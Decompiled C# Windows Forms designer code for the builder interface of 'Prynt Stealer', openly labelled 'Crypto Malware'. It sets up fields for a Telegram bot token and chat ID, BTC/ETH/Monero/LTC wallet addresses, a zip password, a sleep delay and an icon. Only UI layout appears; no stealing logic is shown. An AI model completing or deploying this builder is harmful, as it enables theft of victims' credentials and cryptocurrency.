namespace PryntStealer
{
	// Token: 0x0200000E RID: 14
	public partial class Form1 : global::System.Windows.Forms.Form
	{
		// Token: 0x06000068 RID: 104 RVA: 0x00006BD8 File Offset: 0x00004DD8
		protected override void Dispose(bool disposing)
		{
			if (disposing && this.components != null)
			{
				this.components.Dispose();
			}
			base.Dispose(disposing);
		}

		// Token: 0x06000069 RID: 105 RVA: 0x00006BF8 File Offset: 0x00004DF8
		private void InitializeComponent()
		{
			global::System.ComponentModel.ComponentResourceManager componentResourceManager = new global::System.ComponentModel.ComponentResourceManager(typeof(global::PryntStealer.Form1));
			global::Bunifu.UI.WinForms.BunifuButton.BunifuButton.BorderEdges borderEdges = new global::Bunifu.UI.WinForms.BunifuButton.BunifuButton.BorderEdges();
			global::Bunifu.UI.WinForms.BunifuButton.BunifuButton.BorderEdges borderEdges2 = new global::Bunifu.UI.WinForms.BunifuButton.BunifuButton.BorderEdges();
			this.label3 = new global::System.Windows.Forms.Label();
			this.pictureIcon = new global::System.Windows.Forms.PictureBox();
			this.label5 = new global::System.Windows.Forms.Label();
			this.label6 = new global::System.Windows.Forms.Label();
			this.label2 = new global::System.Windows.Forms.Label();
			this.bunifuGradientPanel1 = new global::Bunifu.UI.WinForms.BunifuGradientPanel();
			this.siticoneCircleButton1 = new global::Siticone.UI.WinForms.SiticoneCircleButton();
			this.bunifuPictureBox1 = new global::Bunifu.UI.WinForms.BunifuPictureBox();
			this.bunifuGradientPanel2 = new global::Bunifu.UI.WinForms.BunifuGradientPanel();
			this.bunifuButton2 = new global::Bunifu.UI.WinForms.BunifuButton.BunifuButton();
			this.label1 = new global::System.Windows.Forms.Label();
			this.bunifuButton1 = new global::Bunifu.UI.WinForms.BunifuButton.BunifuButton();
			this.bunifuGradientPanel3 = new global::Bunifu.UI.WinForms.BunifuGradientPanel();
			this.password = new global::Siticone.UI.WinForms.SiticoneRoundedTextBox();
			this.button1 = new global::Siticone.UI.WinForms.SiticoneCircleButton();
			this.label12 = new global::System.Windows.Forms.Label();
			this.label10 = new global::System.Windows.Forms.Label();
			this.label4 = new global::System.Windows.Forms.Label();
			this.checkBox3 = new global::Bunifu.UI.WinForms.BunifuCheckBox();
			this.checkBox2 = new global::Bunifu.UI.WinForms.BunifuCheckBox();
			this.checkBox1 = new global::Bunifu.UI.WinForms.BunifuCheckBox();
			this.label11 = new global::System.Windows.Forms.Label();
			this.txtIcon = new global::Siticone.UI.WinForms.SiticoneRoundedTextBox();
			this.token = new global::Siticone.UI.WinForms.SiticoneRoundedTextBox();
			this.numericUpDown1 = new global::Siticone.UI.WinForms.SiticoneRoundedNumericUpDown();
			this.chatid = new global::Siticone.UI.WinForms.SiticoneRoundedTextBox();
			this.button2 = new global::System.Windows.Forms.Button();
			this.label9 = new global::System.Windows.Forms.Label();
			this.label8 = new global::System.Windows.Forms.Label();
			this.label7 = new global::System.Windows.Forms.Label();
			this.ltc = new global::Siticone.UI.WinForms.SiticoneRoundedTextBox();
			this.monero = new global::Siticone.UI.WinForms.SiticoneRoundedTextBox();
			this.eth = new global::Siticone.UI.WinForms.SiticoneRoundedTextBox();
			this.btc = new global::Siticone.UI.WinForms.SiticoneRoundedTextBox();
			((global::System.ComponentModel.ISupportInitialize)this.pictureIcon).BeginInit();
			this.bunifuGradientPanel1.SuspendLayout();
			((global::System.ComponentModel.ISupportInitialize)this.bunifuPictureBox1).BeginInit();
			this.bunifuGradientPanel2.SuspendLayout();
			this.bunifuGradientPanel3.SuspendLayout();
			((global::System.ComponentModel.ISupportInitialize)this.numericUpDown1).BeginInit();
			base.SuspendLayout();
			this.label3.AutoSize = true;
			this.label3.BackColor = global::System.Drawing.Color.Transparent;
			this.label3.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 10.25f);
			this.label3.ForeColor = global::System.Drawing.SystemColors.MenuHighlight;
			this.label3.Location = new global::System.Drawing.Point(692, 410);
			this.label3.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.label3.Name = "label3";
			this.label3.Size = new global::System.Drawing.Size(43, 22);
			this.label3.TabIndex = 7;
			this.label3.Text = "Icon";
			this.label3.TextAlign = global::System.Drawing.ContentAlignment.MiddleRight;
			this.label3.Click += new global::System.EventHandler(this.label3_Click);
			this.pictureIcon.BackColor = global::System.Drawing.Color.Transparent;
			this.pictureIcon.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
			this.pictureIcon.Location = new global::System.Drawing.Point(757, 391);
			this.pictureIcon.Margin = new global::System.Windows.Forms.Padding(3, 2, 3, 2);
			this.pictureIcon.Name = "pictureIcon";
			this.pictureIcon.Size = new global::System.Drawing.Size(53, 45);
			this.pictureIcon.SizeMode = global::System.Windows.Forms.PictureBoxSizeMode.StretchImage;
			this.pictureIcon.TabIndex = 9;
			this.pictureIcon.TabStop = false;
			this.label5.AutoSize = true;
			this.label5.BackColor = global::System.Drawing.Color.Transparent;
			this.label5.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 15.25f);
			this.label5.ForeColor = global::System.Drawing.Color.White;
			this.label5.Location = new global::System.Drawing.Point(68, 89);
			this.label5.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.label5.Name = "label5";
			this.label5.Size = new global::System.Drawing.Size(201, 30);
			this.label5.TabIndex = 18;
			this.label5.Text = "Crypto Malware ";
			this.label6.AutoSize = true;
			this.label6.BackColor = global::System.Drawing.Color.Transparent;
			this.label6.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 15.75f, global::System.Drawing.FontStyle.Bold);
			this.label6.ForeColor = global::System.Drawing.SystemColors.Control;
			this.label6.Location = new global::System.Drawing.Point(4, 170);
			this.label6.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.label6.Name = "label6";
			this.label6.Size = new global::System.Drawing.Size(72, 31);
			this.label6.TabIndex = 19;
			this.label6.Text = "BTC";
			this.label6.Click += new global::System.EventHandler(this.label6_Click);
			this.label2.AutoSize = true;
			this.label2.BackColor = global::System.Drawing.Color.Transparent;
			this.label2.Font = new global::System.Drawing.Font("Comic Sans MS", 10.8f, global::System.Drawing.FontStyle.Bold | global::System.Drawing.FontStyle.Italic, global::System.Drawing.GraphicsUnit.Point, 0);
			this.label2.ForeColor = global::System.Drawing.SystemColors.Info;
			this.label2.Location = new global::System.Drawing.Point(99, 410);
			this.label2.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.label2.Name = "label2";
			this.label2.Size = new global::System.Drawing.Size(59, 26);
			this.label2.TabIndex = 27;
			this.label2.Text = "Sleep";
			this.bunifuGradientPanel1.BackColor = global::System.Drawing.Color.Transparent;
			this.bunifuGradientPanel1.BackgroundImage = (global::System.Drawing.Image)componentResourceManager.GetObject("bunifuGradientPanel1.BackgroundImage");
			this.bunifuGradientPanel1.BackgroundImageLayout = global::System.Windows.Forms.ImageLayout.Stretch;
			this.bunifuGradientPanel1.BorderRadius = 1;
			this.bunifuGradientPanel1.Controls.Add(this.siticoneCircleButton1);
			this.bunifuGradientPanel1.Controls.Add(this.bunifuPictureBox1);
			this.bunifuGradientPanel1.GradientBottomLeft = global::System.Drawing.Color.DodgerBlue;
			this.bunifuGradientPanel1.GradientBottomRight = global::System.Drawing.Color.Navy;
			this.bunifuGradientPanel1.GradientTopLeft = global::System.Drawing.Color.DodgerBlue;
			this.bunifuGradientPanel1.GradientTopRight = global::System.Drawing.Color.DodgerBlue;
			this.bunifuGradientPanel1.Location = new global::System.Drawing.Point(-1, 0);
			this.bunifuGradientPanel1.Margin = new global::System.Windows.Forms.Padding(4, 4, 4, 4);
			this.bunifuGradientPanel1.Name = "bunifuGradientPanel1";
			this.bunifuGradientPanel1.Quality = 10;
			this.bunifuGradientPanel1.Size = new global::System.Drawing.Size(208, 571);
			this.bunifuGradientPanel1.TabIndex = 29;
			this.siticoneCircleButton1.CheckedState.Parent = this.siticoneCircleButton1;
			this.siticoneCircleButton1.CustomImages.Parent = this.siticoneCircleButton1;
			this.siticoneCircleButton1.FillColor = global::System.Drawing.Color.Transparent;
			this.siticoneCircleButton1.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 10.25f);
			this.siticoneCircleButton1.ForeColor = global::System.Drawing.Color.White;
			this.siticoneCircleButton1.HoveredState.Parent = this.siticoneCircleButton1;
			this.siticoneCircleButton1.Location = new global::System.Drawing.Point(37, 378);
			this.siticoneCircleButton1.Margin = new global::System.Windows.Forms.Padding(4, 4, 4, 4);
			this.siticoneCircleButton1.Name = "siticoneCircleButton1";
			this.siticoneCircleButton1.ShadowDecoration.Mode = global::Siticone.UI.WinForms.Enums.ShadowMode.Circle;
			this.siticoneCircleButton1.ShadowDecoration.Parent = this.siticoneCircleButton1;
			this.siticoneCircleButton1.Size = new global::System.Drawing.Size(133, 114);
			this.siticoneCircleButton1.TabIndex = 1;
			this.siticoneCircleButton1.Text = "About";
			this.siticoneCircleButton1.Click += new global::System.EventHandler(this.siticoneCircleButton1_Click);
			this.bunifuPictureBox1.AllowFocused = false;
			this.bunifuPictureBox1.Anchor = global::System.Windows.Forms.AnchorStyles.None;
			this.bunifuPictureBox1.AutoSizeHeight = true;
			this.bunifuPictureBox1.BorderRadius = 0;
			this.bunifuPictureBox1.Image = (global::System.Drawing.Image)componentResourceManager.GetObject("bunifuPictureBox1.Image");
			this.bunifuPictureBox1.IsCircle = true;
			this.bunifuPictureBox1.Location = new global::System.Drawing.Point(37, 58);
			this.bunifuPictureBox1.Margin = new global::System.Windows.Forms.Padding(4, 4, 4, 4);
			this.bunifuPictureBox1.Name = "bunifuPictureBox1";
			this.bunifuPictureBox1.Size = new global::System.Drawing.Size(133, 133);
			this.bunifuPictureBox1.SizeMode = global::System.Windows.Forms.PictureBoxSizeMode.Zoom;
			this.bunifuPictureBox1.TabIndex = 0;
			this.bunifuPictureBox1.TabStop = false;
			this.bunifuPictureBox1.Type = global::Bunifu.UI.WinForms.BunifuPictureBox.Types.Square;
			this.bunifuPictureBox1.Click += new global::System.EventHandler(this.bunifuPictureBox1_Click);
			this.bunifuGradientPanel2.BackColor = global::System.Drawing.Color.Transparent;
			this.bunifuGradientPanel2.BackgroundImage = (global::System.Drawing.Image)componentResourceManager.GetObject("bunifuGradientPanel2.BackgroundImage");
			this.bunifuGradientPanel2.BackgroundImageLayout = global::System.Windows.Forms.ImageLayout.Stretch;
			this.bunifuGradientPanel2.BorderRadius = 1;
			this.bunifuGradientPanel2.Controls.Add(this.bunifuButton2);
			this.bunifuGradientPanel2.Controls.Add(this.label1);
			this.bunifuGradientPanel2.Controls.Add(this.bunifuButton1);
			this.bunifuGradientPanel2.Dock = global::System.Windows.Forms.DockStyle.Top;
			this.bunifuGradientPanel2.GradientBottomLeft = global::System.Drawing.Color.DodgerBlue;
			this.bunifuGradientPanel2.GradientBottomRight = global::System.Drawing.Color.Navy;
			this.bunifuGradientPanel2.GradientTopLeft = global::System.Drawing.Color.DodgerBlue;
			this.bunifuGradientPanel2.GradientTopRight = global::System.Drawing.Color.Navy;
			this.bunifuGradientPanel2.Location = new global::System.Drawing.Point(0, 0);
			this.bunifuGradientPanel2.Margin = new global::System.Windows.Forms.Padding(4, 4, 4, 4);
			this.bunifuGradientPanel2.Name = "bunifuGradientPanel2";
			this.bunifuGradientPanel2.Quality = 10;
			this.bunifuGradientPanel2.Size = new global::System.Drawing.Size(1261, 43);
			this.bunifuGradientPanel2.TabIndex = 30;
			this.bunifuGradientPanel2.Click += new global::System.EventHandler(this.bunifuGradientPanel2_Click);
			this.bunifuButton2.AllowAnimations = true;
			this.bunifuButton2.AllowMouseEffects = true;
			this.bunifuButton2.AllowToggling = false;
			this.bunifuButton2.AnimationSpeed = 200;
			this.bunifuButton2.AutoGenerateColors = false;
			this.bunifuButton2.AutoRoundBorders = false;
			this.bunifuButton2.AutoSizeLeftIcon = true;
			this.bunifuButton2.AutoSizeRightIcon = true;
			this.bunifuButton2.BackColor = global::System.Drawing.Color.Transparent;
			this.bunifuButton2.BackColor1 = global::System.Drawing.Color.Transparent;
			this.bunifuButton2.BackgroundImage = (global::System.Drawing.Image)componentResourceManager.GetObject("bunifuButton2.BackgroundImage");
			this.bunifuButton2.BorderStyle = global::Bunifu.UI.WinForms.BunifuButton.BunifuButton.BorderStyles.Solid;
			this.bunifuButton2.ButtonText = "-";
			this.bunifuButton2.ButtonTextMarginLeft = 0;
			this.bunifuButton2.ColorContrastOnClick = 45;
			this.bunifuButton2.ColorContrastOnHover = 45;
			this.bunifuButton2.Cursor = global::System.Windows.Forms.Cursors.Default;
			borderEdges.BottomLeft = true;
			borderEdges.BottomRight = true;
			borderEdges.TopLeft = true;
			borderEdges.TopRight = true;
			this.bunifuButton2.CustomizableEdges = borderEdges;
			this.bunifuButton2.DialogResult = global::System.Windows.Forms.DialogResult.None;
			this.bunifuButton2.DisabledBorderColor = global::System.Drawing.Color.FromArgb(191, 191, 191);
			this.bunifuButton2.DisabledFillColor = global::System.Drawing.Color.FromArgb(204, 204, 204);
			this.bunifuButton2.DisabledForecolor = global::System.Drawing.Color.FromArgb(168, 160, 168);
			this.bunifuButton2.FocusState = global::Bunifu.UI.WinForms.BunifuButton.BunifuButton.ButtonStates.Pressed;
			this.bunifuButton2.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 18f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.bunifuButton2.ForeColor = global::System.Drawing.Color.White;
			this.bunifuButton2.IconLeftAlign = global::System.Drawing.ContentAlignment.MiddleLeft;
			this.bunifuButton2.IconLeftCursor = global::System.Windows.Forms.Cursors.Default;
			this.bunifuButton2.IconLeftPadding = new global::System.Windows.Forms.Padding(11, 3, 3, 3);
			this.bunifuButton2.IconMarginLeft = 11;
			this.bunifuButton2.IconPadding = 10;
			this.bunifuButton2.IconRightAlign = global::System.Drawing.ContentAlignment.MiddleRight;
			this.bunifuButton2.IconRightCursor = global::System.Windows.Forms.Cursors.Default;
			this.bunifuButton2.IconRightPadding = new global::System.Windows.Forms.Padding(3, 3, 7, 3);
			this.bunifuButton2.IconSize = 25;
			this.bunifuButton2.IdleBorderColor = global::System.Drawing.Color.Transparent;
			this.bunifuButton2.IdleBorderRadius = 1;
			this.bunifuButton2.IdleBorderThickness = 1;
			this.bunifuButton2.IdleFillColor = global::System.Drawing.Color.Transparent;
			this.bunifuButton2.IdleIconLeftImage = null;
			this.bunifuButton2.IdleIconRightImage = null;
			this.bunifuButton2.IndicateFocus = false;
			this.bunifuButton2.Location = new global::System.Drawing.Point(1104, 0);
			this.bunifuButton2.Margin = new global::System.Windows.Forms.Padding(4, 4, 4, 4);
			this.bunifuButton2.Name = "bunifuButton2";
			this.bunifuButton2.OnDisabledState.BorderColor = global::System.Drawing.Color.FromArgb(191, 191, 191);
			this.bunifuButton2.OnDisabledState.BorderRadius = 1;
			this.bunifuButton2.OnDisabledState.BorderStyle = global::Bunifu.UI.WinForms.BunifuButton.BunifuButton.BorderStyles.Solid;
			this.bunifuButton2.OnDisabledState.BorderThickness = 1;
			this.bunifuButton2.OnDisabledState.FillColor = global::System.Drawing.Color.FromArgb(204, 204, 204);
			this.bunifuButton2.OnDisabledState.ForeColor = global::System.Drawing.Color.FromArgb(168, 160, 168);
			this.bunifuButton2.OnDisabledState.IconLeftImage = null;
			this.bunifuButton2.OnDisabledState.IconRightImage = null;
			this.bunifuButton2.onHoverState.BorderColor = global::System.Drawing.Color.FromArgb(105, 181, 255);
			this.bunifuButton2.onHoverState.BorderRadius = 1;
			this.bunifuButton2.onHoverState.BorderStyle = global::Bunifu.UI.WinForms.BunifuButton.BunifuButton.BorderStyles.Solid;
			this.bunifuButton2.onHoverState.BorderThickness = 1;
			this.bunifuButton2.onHoverState.FillColor = global::System.Drawing.Color.FromArgb(105, 181, 255);
			this.bunifuButton2.onHoverState.ForeColor = global::System.Drawing.Color.White;
			this.bunifuButton2.onHoverState.IconLeftImage = null;
			this.bunifuButton2.onHoverState.IconRightImage = null;
			this.bunifuButton2.OnIdleState.BorderColor = global::System.Drawing.Color.Transparent;
			this.bunifuButton2.OnIdleState.BorderRadius = 1;
			this.bunifuButton2.OnIdleState.BorderStyle = global::Bunifu.UI.WinForms.BunifuButton.BunifuButton.BorderStyles.Solid;
			this.bunifuButton2.OnIdleState.BorderThickness = 1;
			this.bunifuButton2.OnIdleState.FillColor = global::System.Drawing.Color.Transparent;
			this.bunifuButton2.OnIdleState.ForeColor = global::System.Drawing.Color.White;
			this.bunifuButton2.OnIdleState.IconLeftImage = null;
			this.bunifuButton2.OnIdleState.IconRightImage = null;
			this.bunifuButton2.OnPressedState.BorderColor = global::System.Drawing.Color.FromArgb(40, 96, 144);
			this.bunifuButton2.OnPressedState.BorderRadius = 1;
			this.bunifuButton2.OnPressedState.BorderStyle = global::Bunifu.UI.WinForms.BunifuButton.BunifuButton.BorderStyles.Solid;
			this.bunifuButton2.OnPressedState.BorderThickness = 1;
			this.bunifuButton2.OnPressedState.FillColor = global::System.Drawing.Color.FromArgb(40, 96, 144);
			this.bunifuButton2.OnPressedState.ForeColor = global::System.Drawing.Color.White;
			this.bunifuButton2.OnPressedState.IconLeftImage = null;
			this.bunifuButton2.OnPressedState.IconRightImage = null;
			this.bunifuButton2.Size = new global::System.Drawing.Size(75, 43);
			this.bunifuButton2.TabIndex = 38;
			this.bunifuButton2.TextAlign = global::System.Drawing.ContentAlignment.MiddleCenter;
			this.bunifuButton2.TextAlignment = global::System.Windows.Forms.HorizontalAlignment.Center;
			this.bunifuButton2.TextMarginLeft = 0;
			this.bunifuButton2.TextPadding = new global::System.Windows.Forms.Padding(0);
			this.bunifuButton2.UseDefaultRadiusAndThickness = true;
			this.bunifuButton2.Click += new global::System.EventHandler(this.bunifuButton2_Click);
			this.label1.AutoSize = true;
			this.label1.BackColor = global::System.Drawing.Color.Transparent;
			this.label1.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 15.25f);
			this.label1.ForeColor = global::System.Drawing.Color.White;
			this.label1.Location = new global::System.Drawing.Point(4, 9);
			this.label1.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.label1.Name = "label1";
			this.label1.Size = new global::System.Drawing.Size(182, 30);
			this.label1.TabIndex = 37;
			this.label1.Text = "   Prynt Stealer";
			this.label1.TextAlign = global::System.Drawing.ContentAlignment.TopCenter;
			this.bunifuButton1.AllowAnimations = true;
			this.bunifuButton1.AllowMouseEffects = true;
			this.bunifuButton1.AllowToggling = false;
			this.bunifuButton1.AnimationSpeed = 200;
			this.bunifuButton1.AutoGenerateColors = false;
			this.bunifuButton1.AutoRoundBorders = false;
			this.bunifuButton1.AutoSizeLeftIcon = true;
			this.bunifuButton1.AutoSizeRightIcon = true;
			this.bunifuButton1.BackColor = global::System.Drawing.Color.Transparent;
			this.bunifuButton1.BackColor1 = global::System.Drawing.Color.Transparent;
			this.bunifuButton1.BackgroundImage = (global::System.Drawing.Image)componentResourceManager.GetObject("bunifuButton1.BackgroundImage");
			this.bunifuButton1.BorderStyle = global::Bunifu.UI.WinForms.BunifuButton.BunifuButton.BorderStyles.Solid;
			this.bunifuButton1.ButtonText = "X";
			this.bunifuButton1.ButtonTextMarginLeft = 0;
			this.bunifuButton1.ColorContrastOnClick = 45;
			this.bunifuButton1.ColorContrastOnHover = 45;
			this.bunifuButton1.Cursor = global::System.Windows.Forms.Cursors.Default;
			borderEdges2.BottomLeft = true;
			borderEdges2.BottomRight = true;
			borderEdges2.TopLeft = true;
			borderEdges2.TopRight = true;
			this.bunifuButton1.CustomizableEdges = borderEdges2;
			this.bunifuButton1.DialogResult = global::System.Windows.Forms.DialogResult.None;
			this.bunifuButton1.DisabledBorderColor = global::System.Drawing.Color.FromArgb(191, 191, 191);
			this.bunifuButton1.DisabledFillColor = global::System.Drawing.Color.FromArgb(204, 204, 204);
			this.bunifuButton1.DisabledForecolor = global::System.Drawing.Color.FromArgb(168, 160, 168);
			this.bunifuButton1.FocusState = global::Bunifu.UI.WinForms.BunifuButton.BunifuButton.ButtonStates.Pressed;
			this.bunifuButton1.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 14.25f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
			this.bunifuButton1.ForeColor = global::System.Drawing.Color.White;
			this.bunifuButton1.IconLeftAlign = global::System.Drawing.ContentAlignment.MiddleLeft;
			this.bunifuButton1.IconLeftCursor = global::System.Windows.Forms.Cursors.Default;
			this.bunifuButton1.IconLeftPadding = new global::System.Windows.Forms.Padding(11, 3, 3, 3);
			this.bunifuButton1.IconMarginLeft = 11;
			this.bunifuButton1.IconPadding = 10;
			this.bunifuButton1.IconRightAlign = global::System.Drawing.ContentAlignment.MiddleRight;
			this.bunifuButton1.IconRightCursor = global::System.Windows.Forms.Cursors.Default;
			this.bunifuButton1.IconRightPadding = new global::System.Windows.Forms.Padding(3, 3, 7, 3);
			this.bunifuButton1.IconSize = 25;
			this.bunifuButton1.IdleBorderColor = global::System.Drawing.Color.Transparent;
			this.bunifuButton1.IdleBorderRadius = 1;
			this.bunifuButton1.IdleBorderThickness = 1;
			this.bunifuButton1.IdleFillColor = global::System.Drawing.Color.Transparent;
			this.bunifuButton1.IdleIconLeftImage = null;
			this.bunifuButton1.IdleIconRightImage = null;
			this.bunifuButton1.IndicateFocus = false;
			this.bunifuButton1.Location = new global::System.Drawing.Point(1187, 0);
			this.bunifuButton1.Margin = new global::System.Windows.Forms.Padding(4, 4, 4, 4);
			this.bunifuButton1.Name = "bunifuButton1";
			this.bunifuButton1.OnDisabledState.BorderColor = global::System.Drawing.Color.FromArgb(191, 191, 191);
			this.bunifuButton1.OnDisabledState.BorderRadius = 1;
			this.bunifuButton1.OnDisabledState.BorderStyle = global::Bunifu.UI.WinForms.BunifuButton.BunifuButton.BorderStyles.Solid;
			this.bunifuButton1.OnDisabledState.BorderThickness = 1;
			this.bunifuButton1.OnDisabledState.FillColor = global::System.Drawing.Color.FromArgb(204, 204, 204);
			this.bunifuButton1.OnDisabledState.ForeColor = global::System.Drawing.Color.FromArgb(168, 160, 168);
			this.bunifuButton1.OnDisabledState.IconLeftImage = null;
			this.bunifuButton1.OnDisabledState.IconRightImage = null;
			this.bunifuButton1.onHoverState.BorderColor = global::System.Drawing.Color.FromArgb(105, 181, 255);
			this.bunifuButton1.onHoverState.BorderRadius = 1;
			this.bunifuButton1.onHoverState.BorderStyle = global::Bunifu.UI.WinForms.BunifuButton.BunifuButton.BorderStyles.Solid;
			this.bunifuButton1.onHoverState.BorderThickness = 1;
			this.bunifuButton1.onHoverState.FillColor = global::System.Drawing.Color.FromArgb(105, 181, 255);
			this.bunifuButton1.onHoverState.ForeColor = global::System.Drawing.Color.White;
			this.bunifuButton1.onHoverState.IconLeftImage = null;
			this.bunifuButton1.onHoverState.IconRightImage = null;
			this.bunifuButton1.OnIdleState.BorderColor = global::System.Drawing.Color.Transparent;
			this.bunifuButton1.OnIdleState.BorderRadius = 1;
			this.bunifuButton1.OnIdleState.BorderStyle = global::Bunifu.UI.WinForms.BunifuButton.BunifuButton.BorderStyles.Solid;
			this.bunifuButton1.OnIdleState.BorderThickness = 1;
			this.bunifuButton1.OnIdleState.FillColor = global::System.Drawing.Color.Transparent;
			this.bunifuButton1.OnIdleState.ForeColor = global::System.Drawing.Color.White;
			this.bunifuButton1.OnIdleState.IconLeftImage = null;
			this.bunifuButton1.OnIdleState.IconRightImage = null;
			this.bunifuButton1.OnPressedState.BorderColor = global::System.Drawing.Color.FromArgb(40, 96, 144);
			this.bunifuButton1.OnPressedState.BorderRadius = 1;
			this.bunifuButton1.OnPressedState.BorderStyle = global::Bunifu.UI.WinForms.BunifuButton.BunifuButton.BorderStyles.Solid;
			this.bunifuButton1.OnPressedState.BorderThickness = 1;
			this.bunifuButton1.OnPressedState.FillColor = global::System.Drawing.Color.FromArgb(40, 96, 144);
			this.bunifuButton1.OnPressedState.ForeColor = global::System.Drawing.Color.White;
			this.bunifuButton1.OnPressedState.IconLeftImage = null;
			this.bunifuButton1.OnPressedState.IconRightImage = null;
			this.bunifuButton1.Size = new global::System.Drawing.Size(75, 43);
			this.bunifuButton1.TabIndex = 0;
			this.bunifuButton1.TextAlign = global::System.Drawing.ContentAlignment.MiddleCenter;
			this.bunifuButton1.TextAlignment = global::System.Windows.Forms.HorizontalAlignment.Center;
			this.bunifuButton1.TextMarginLeft = 0;
			this.bunifuButton1.TextPadding = new global::System.Windows.Forms.Padding(0);
			this.bunifuButton1.UseDefaultRadiusAndThickness = true;
			this.bunifuButton1.Click += new global::System.EventHandler(this.bunifuButton1_Click);
			this.bunifuGradientPanel3.BackColor = global::System.Drawing.Color.Transparent;
			this.bunifuGradientPanel3.BackgroundImage = (global::System.Drawing.Image)componentResourceManager.GetObject("bunifuGradientPanel3.BackgroundImage");
			this.bunifuGradientPanel3.BackgroundImageLayout = global::System.Windows.Forms.ImageLayout.Stretch;
			this.bunifuGradientPanel3.BorderRadius = 1;
			this.bunifuGradientPanel3.Controls.Add(this.password);
			this.bunifuGradientPanel3.Controls.Add(this.button1);
			this.bunifuGradientPanel3.Controls.Add(this.label12);
			this.bunifuGradientPanel3.Controls.Add(this.label10);
			this.bunifuGradientPanel3.Controls.Add(this.label4);
			this.bunifuGradientPanel3.Controls.Add(this.checkBox3);
			this.bunifuGradientPanel3.Controls.Add(this.checkBox2);
			this.bunifuGradientPanel3.Controls.Add(this.checkBox1);
			this.bunifuGradientPanel3.Controls.Add(this.label11);
			this.bunifuGradientPanel3.Controls.Add(this.txtIcon);
			this.bunifuGradientPanel3.Controls.Add(this.token);
			this.bunifuGradientPanel3.Controls.Add(this.numericUpDown1);
			this.bunifuGradientPanel3.Controls.Add(this.chatid);
			this.bunifuGradientPanel3.Controls.Add(this.button2);
			this.bunifuGradientPanel3.Controls.Add(this.label9);
			this.bunifuGradientPanel3.Controls.Add(this.label8);
			this.bunifuGradientPanel3.Controls.Add(this.label7);
			this.bunifuGradientPanel3.Controls.Add(this.ltc);
			this.bunifuGradientPanel3.Controls.Add(this.monero);
			this.bunifuGradientPanel3.Controls.Add(this.eth);
			this.bunifuGradientPanel3.Controls.Add(this.btc);
			this.bunifuGradientPanel3.Controls.Add(this.label2);
			this.bunifuGradientPanel3.Controls.Add(this.label6);
			this.bunifuGradientPanel3.Controls.Add(this.label5);
			this.bunifuGradientPanel3.Controls.Add(this.pictureIcon);
			this.bunifuGradientPanel3.Controls.Add(this.label3);
			this.bunifuGradientPanel3.Dock = global::System.Windows.Forms.DockStyle.Right;
			this.bunifuGradientPanel3.GradientBottomLeft = global::System.Drawing.Color.DodgerBlue;
			this.bunifuGradientPanel3.GradientBottomRight = global::System.Drawing.Color.Navy;
			this.bunifuGradientPanel3.GradientTopLeft = global::System.Drawing.Color.DodgerBlue;
			this.bunifuGradientPanel3.GradientTopRight = global::System.Drawing.Color.DodgerBlue;
			this.bunifuGradientPanel3.Location = new global::System.Drawing.Point(205, 43);
			this.bunifuGradientPanel3.Margin = new global::System.Windows.Forms.Padding(4, 4, 4, 4);
			this.bunifuGradientPanel3.Name = "bunifuGradientPanel3";
			this.bunifuGradientPanel3.Quality = 10;
			this.bunifuGradientPanel3.Size = new global::System.Drawing.Size(1056, 527);
			this.bunifuGradientPanel3.TabIndex = 31;
			this.bunifuGradientPanel3.Click += new global::System.EventHandler(this.bunifuGradientPanel3_Click);
			this.password.Cursor = global::System.Windows.Forms.Cursors.IBeam;
			this.password.DefaultText = "Zip password";
			this.password.DisabledState.BorderColor = global::System.Drawing.Color.FromArgb(208, 208, 208);
			this.password.DisabledState.FillColor = global::System.Drawing.Color.FromArgb(226, 226, 226);
			this.password.DisabledState.ForeColor = global::System.Drawing.Color.FromArgb(138, 138, 138);
			this.password.DisabledState.Parent = this.password;
			this.password.DisabledState.PlaceholderForeColor = global::System.Drawing.Color.FromArgb(138, 138, 138);
			this.password.FocusedState.BorderColor = global::System.Drawing.Color.FromArgb(94, 148, 255);
			this.password.FocusedState.Parent = this.password;
			this.password.HoveredState.BorderColor = global::System.Drawing.Color.FromArgb(94, 148, 255);
			this.password.HoveredState.Parent = this.password;
			this.password.Location = new global::System.Drawing.Point(656, 282);
			this.password.Margin = new global::System.Windows.Forms.Padding(5, 5, 5, 5);
			this.password.Name = "password";
			this.password.PasswordChar = '\0';
			this.password.PlaceholderText = "";
			this.password.SelectedText = "";
			this.password.ShadowDecoration.Parent = this.password;
			this.password.Size = new global::System.Drawing.Size(243, 50);
			this.password.TabIndex = 50;
			this.password.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
			this.button1.CheckedState.Parent = this.button1;
			this.button1.CustomImages.Parent = this.button1;
			this.button1.FillColor = global::System.Drawing.Color.Transparent;
			this.button1.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 10.25f);
			this.button1.ForeColor = global::System.Drawing.Color.White;
			this.button1.HoveredState.Parent = this.button1;
			this.button1.Location = new global::System.Drawing.Point(776, 443);
			this.button1.Margin = new global::System.Windows.Forms.Padding(4, 4, 4, 4);
			this.button1.Name = "button1";
			this.button1.ShadowDecoration.Mode = global::Siticone.UI.WinForms.Enums.ShadowMode.Circle;
			this.button1.ShadowDecoration.Parent = this.button1;
			this.button1.Size = new global::System.Drawing.Size(123, 54);
			this.button1.TabIndex = 49;
			this.button1.Text = "Browse";
			this.button1.TextRenderingHint = global::System.Drawing.Text.TextRenderingHint.SystemDefault;
			this.button1.Click += new global::System.EventHandler(this.button1_Click_1);
			this.label12.AutoSize = true;
			this.label12.BackColor = global::System.Drawing.Color.Transparent;
			this.label12.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 15.25f);
			this.label12.ForeColor = global::System.Drawing.Color.White;
